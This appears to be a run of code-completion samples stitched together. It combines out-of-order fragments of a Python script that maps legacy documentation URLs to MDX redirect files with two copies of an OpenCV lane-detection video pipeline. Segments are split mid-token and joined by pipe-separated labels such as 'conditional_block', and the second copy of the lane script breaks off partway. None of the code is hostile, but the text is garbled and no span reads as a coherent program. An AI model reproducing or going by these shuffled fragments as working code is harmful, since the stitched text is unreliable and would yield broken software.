# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
produ | int("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| ct_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
pr | conditional_block |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
|
cap.release()
result1.release()
cv2.destroyAllWindows() | count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
#**Drwaing on image the lane**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
#flipud is just reversing the order of the points which are from top to bottom to make them bottom to top so that we can have an anticlockwise ordering of the corners.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break | conditional_block |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
| #plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
